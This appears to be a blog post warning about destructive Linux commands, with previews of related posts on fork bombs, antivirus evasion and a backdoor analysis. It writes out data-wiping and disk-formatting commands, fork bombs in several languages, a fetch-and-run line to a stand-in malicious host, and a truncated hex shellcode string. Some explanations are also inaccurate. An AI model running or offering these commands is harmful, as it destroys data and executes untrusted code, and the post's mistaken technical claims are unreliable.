Twelve Unique Linux Commands that Should Never be Used

By -
After implementing a fork bomb in eleven different language implementations ~] the tuto [~ , I got inspired to revisit the few strings when executed in the Linux terminal, can be all kinds of destructive to the host. I'm not re-inventing the wheel here. Many of you probably know them, (and the variants), there's nothing new here. However, it's a good practice to review these type of things from time to time. So enjoy but do not run any of these on your system. I have provided descriptions for each, discussing what the results will be if you make a mistake. If these are new to you, understand the precautions, and do not use any of these. Thank you.

.rm rf
The rm -rf command is a simplistic, low level cmd an one of the fastest ways to delete files, dirs and their contents. But a little ignorance of the cmds may result in an unrecoverable system, even damage hw. Some of the destructive options used with rm are:
  1. .rm              //* base cmd used to delete files.
  2. .rm -r          //* deletes the named folder recursively, (everything within the dir)..
  3. .rm -f           //* cmd ignores ‘read only' files without asking.
  4. .rm -rf /.       //* a deletion of everything under root, aka you're entire FS..gone!
  5. .rm -rf *      //* deletes everything in cwd (current working dir/).
  6. .rm -rf .       //* deletes current folder and all sub dirs.


Be careful when you are executing the rm command with any above option bit, unicode or other... to help mitigate any accidental misuse use of this, make sure that you designate a specific item to delete and the file is in your cwd. Then append the filename onto the end of the string. An eample then would be rm <"filename">. Keep it simple.

.:(){:|:&};:
The above is a fork bomb. It operates by defining a function called " : ", which calls itself twice, once in the foreground and once in the background. It executes in an infinite loop until the system has run out of resources and is frozen. Under normal circumstances, a reboot of your system will restore services. IMO, it's not good to leave it in a degraded state like this, it has the potential to cause more damage.

.>/dev/sda
The above command will write raw data to the output, in this case it's on the block /dev/sda. This is also likely known by it's friendly name; you hard drive. The above command writes raw data to all the files on the block will be replaced with raw data, thus resulting in total loss of data and unrecoverable system state.

.mv folder /dev/null
Moves folder (or a file) to /dev/null. In Linux /dev/null or null device is a special file (destination) that discards all the data written to it and reports that write operation succeeded. /dev/null is essentially an empty abyss where files aren't just deleted, the data is instantly written over and completely destroyed. Do I need to mention again it's unrecoverable?

.mv /home/user/* /dev/null
This will move all the contents of a User directory to /dev/null, which literally means everything there was sent to blackhole (null).

.rm -f /usr/bin/sudo;rm -f /bin/su
Revokes sudo and su capabilities, (aka superuser access), and impossible for any root user to perform any admin type tasks, normally requiring a root privilege level. If this ever happens, I have come across a supposed workaround/fix, but since I have never tested it, I can't give the instructions. I don't want to mis-inform anyone.

.wget http://malicious_source.xyz -O- | sh
The above will download a script from a malicious source (website URL) and then execute it. wget command will download the script and shell will execute the downloaded script.

Note: You should be very much aware of the source from where you are downloading packages and scripts. Only use those scripts/applications which is downloaded from a trusted source. It is also a good practice to verify the SHA256 (or similar) checksums of images as well. Debian packages include a keyfile for checking the integrity of the packaged software. There are different ways of doing this but you can install the GPG (GnuPG) encryption and key tool, and be sure to read the install notes. This works with most distros and likely in your repository. Enter the following to install along with any dependencies: apt-get install gnupg2. While focusing on security, instead of performing the regular apt-get update and upgrade, routines or worse, the apt-get dist-upgrade just to get the security updates. The following software package only installs only the security updates in Linux. Just use the following command to install the tool: apt-get install unattended-upgrades, to configure it for manual security upgrades or other granular configs use the command: unattended-upgrades -d. Again, this should be available in most repo's, whatever your distro you are running. Please read the available README file or other available documentation for instructions and compatability prior to download and install.

For Debian based systems only, there is another tool that monitors and notifies of security updates, performs vulnerability scans and check for changes to your system. For install, use command: apt-get install debsecans, and be sure to read about the ~] Debsecan [~ software on their official site.

.> mkfs.ext3 /dev/sda
The above command will format the sda block. You will know if you ran this as your system will become very unstable and crash in short order. This one has a small chance of recovery from the FS corruption by using the following command: fsck -y /dev/sda (aka the hard disk drive). The option bit set to -y will automatically try to fix any errors found without any user interaction, setting option -a will report any errors to stdout. The caveat of this is the FS you need to check cannot be mounted. You would need to run the command from a DVD or USB running a live version. Don't get encouraged though, this is essentially an attempted reformat of a mounted disk. It will likely throw an error as it's not possible to format a mounted (in use) disk. This does NOT mean that it can't cause damage and corrupt the original, intended FS. This type of filesystem mismatch error usually results in a severe loss of functionality and ends with the system in an unrecoverable state.

.> file
The above command is used to flush the content of file. If the above command is executed with a typo or ignorance like > xt.conf, it will purge the content inside the configuration file, or any other file for that matter. I think you get the idea how dangerous this is to a stable OS.

.^foo^bar
This command is used to edit the previous run command without the need of retyping the whole command again. But this can really be troublesome if you didn’t take the risk of thoroughly checking the change in original command using ^foo^bar command.

.dd if=/dev/random of=/dev/sda
The above command will wipe out block sda and write random junk data to the block, leaving your system completely unrecoverable.

Hidding the command.
The command string and shellcode below is simply the first very first command discussed, rm -rf. Here though, the codes are hidden in hex so that a user may be fooled. Running the below code in your terminal will wipe your root partition. This just shows that the threat may be disguised, (or obfuscated), and not always in a human-reabable form. You must be aware of what you are doing and what the results will be. It's a best practice to never compile or run code(s) from an unknown source.

.char esp[] __attribute__((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x53\x34\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd

Note: Do not execute any of the above listed commands in your Linux terminal or shell. Any loss of functionality or data due to the execution of any commands above above can and will break your system, for which the Author of this post is not responsible. The listed commands are fast ways to delete a directory or a file and the ability to permanently modify the contents. This information is served as educational purposes only as these commands could easily result damage to your systems which may be unrecoverable.

However, if you ever do have a need to destroy a file or dir, these will successfully complete the job. Another example of the benefits of Linux and a small example of the benefits of it's low level capabilities.


Cheers.!!


    r3v

Comments

Post a Comment

Popular posts from this blog

fork-bomb in several language implements

By -
anyone that has worked with Linux for any amount of time, the word fork bomb will be familiar. However, it's not just a terminal command. Below are some implementations in other languages, followed by mitigation tactics for Linux distros. BASH $ :(){ :|: & };: .sh (Shell file) #!/bin/bash ./$0|./$0& .bat (Windows bat implements) :TOP start "" %0 goto TOP ~OR~ %0|%0   #below is the same, but done in command line using ^ to escape specials: echo %0^|%0 > forkbomb.bat forkbomb.bat .pl (Perl implement) #! /bin/perl perl -e "fork while fork" & .py (Python implement) #! /bin/py import os while 1:     os.fork() (Java implement) public class ForkBomb {  public static void main(String[] args)   {    while(true)    { Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});   }  } } .js (Jav
[[ more --»-»

Malware and Successful AV Evasion Tactics

By -
The malware ideology, and even it's entire methodology has morphed over the last year or so. It was decided to write a piece to offer some clarity on the idea of “AV evasion”. There seems to be little in depth working knowledge of the actual various techniques used. Time for a quick lesson to give more definition to this increasingly popular malicious scripting. Below is a list of some of the current successful antivirus evasion tactics used by malware. Hash modification. One way AV’s are able to detect if a file is (or contains) a known malware by calculating the file hash. It avoids this detection by changing a simple bit in the binary thus allowing the file to evade any &OR hash detections. Specific malware signatures. Some signatures are specifically designed to catch an exploit or otherwise spotted by specific behaviors. By only reversing the signature, it is possible for this to modify the malware so no matching patterns reside in it's signature. Just one exam
[[ more --»-»

Decryption and Analysis of a "Shell" Backdoor

By -
Image
UPDATE [l] : shortly after finishing this post, I had decided to do a couple scans of the raw code. The results returned several Shell Trojan variants, and doing some permanent damage to windows systems. Reports available at ] VirusTotal ] and [ Malwr ]. Thanks to both services for the great results. It attempted network connx with the original url, not surprise from a webshell, IMO, only a bit strange that the likely 0wn/Op would keep such a trophy case in the wild like that? I mean really??. I would've expected an http request or few since nce that's who was hosting the assets but the requests were made to connect to "Hostthshellcode and then starts the endless streaming of the v1c's data and a continual stream of fresh code for the mal to swap out. This only confirmed the feeling I had about the src code. Multiple langs being used, illogical syntax and it's all just mixed together... if anyone can answer how this can support the back and forth exec using Perl,
[[ more --»-»